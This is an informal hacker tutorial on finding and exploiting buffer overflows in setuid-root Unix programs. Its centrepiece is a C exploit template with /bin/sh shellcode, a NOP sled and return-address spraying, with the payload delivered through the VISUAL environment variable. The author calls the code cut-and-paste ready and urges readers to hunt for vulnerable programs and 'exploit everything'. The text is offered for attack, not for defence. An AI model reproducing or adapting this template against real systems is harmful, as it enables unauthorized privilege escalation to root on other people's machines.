- finding and exploiting programs with buffer overflows
- by prym (prym@sunflower.org)

- introduction

        allright, the technique of gaining root via a buffer overflow has been
used alot in some of the exploits that made there way out into the open.
some of them are dip, splitvt, and mount.  there are others and after
reading this hopefully you'll be able to recognize them.  now on to it.

- how it works

        how the buffer overflow technique works is we find somewhere in the
program exploiting where a undefined length of data that is user
definable is copied into a defined length of data.  and we basicaly make
it overflow.

- example

char *ptr;
char visual[1024];                      - (user definable)

sprintf(visual, "%s %s", ptr, file);    - (ptr(undefinied lentgth) is copied
                                        - to visual(defined length)

        in that function we can cause a buffer overflow.  what happens is
we predefine visual(which is user definable) to something larger than
1024.  the program will cehck that ptr and file together are not greater than
1024 and then attempt to execute sprintf when this happens it will be
much larger that 1024 and there will be a buffer overflow.

- how to do do it

        now earlier i said that we predefine visual to something larger
than 1024.  we do that but we make it larger than 1024 filled with raw
machine code and a command(/bin/sh).  the example i used is attempting to
run whatever the visual editor is set to.  usually pico but defaultly vi.
we might write a program something like this:

#include <unistd.h>                     - normal includes
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_CT "/usr/bin/program"      - define the path to the program
                                        - were going to exploit

u_char shell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

u_long esp() { __asm__("movl %esp, %eax"); }

- machine code that will be ran as the buffer is overflown telling the
- machine to execute /bin/sh

main()                  - main function
{                       - open

u_char buf[2048];       - define what will be visual
u_long addr;            - used for machine code
int i;                  - used for loops

strcpy(buf, "/usr/bin/pico;   ");       - start what will be visual out
                                        - with pico so it looks normal

addr = esp() - 192;
for (i=16; i<128+16; i+=4)
*((u_long *) (buf+i)) = addr;
for (i=128+16; i<1040; i++)
buf[i] = 0x90;
for (i=0; i<strlen(shell); i++)
buf[1040+i] = shell[i];
buf[1040+i] = '\n';

- apply machine code what will be visual

setenv("VISUAL", buf,1);        - predefine visual

execl(PATH_CT, "program", "-options", (char *)0);       - execute the program
                                                        - with -options

}                               - close

- what happens

        now if we compiled our program and ran it this is what would happen.
pico would run(executing begining of buffer to ;) and once we exited pico
the buffer would over flow and exec /bin/sh.  if the program we exploited
was setuid 0'd and no user change was made in the code it would drop us
to a root shell.  for those of you whou would just define visual as
/bin/sh which can be useful in some cases keep in mind this is only an
example.

- how to find programs to exploit

        to find programs to exploit go get the source to some programs
that are normally setuid 0'd and look for sprintfs there a user definable
variable of an undefined length is copied into a defined length and no
check is made as shown above.  you will find these all over the place so
exploit everything. =>

- what do i do now

        go out and find a program to exploit.  look over the source and
find places where you could overflow the buffer.  then go back to the top
of this text file and look at the code i supplied.  the reason i supplied
this code is because it can basicaly be cut and pasted into a working
exploit.  ive written a few of these exploits now and i guarantee you
there are lots of programs out there you can exploit.

- conclusion

        welp.  i hope this information helps you.  and have fun. =>

- the end

- props to all the gang.  (you know who you are and exspecially to z
                           aka senorp because without him this text would
                           not be possible =>)

- by prym
- email: prym@sunflower.org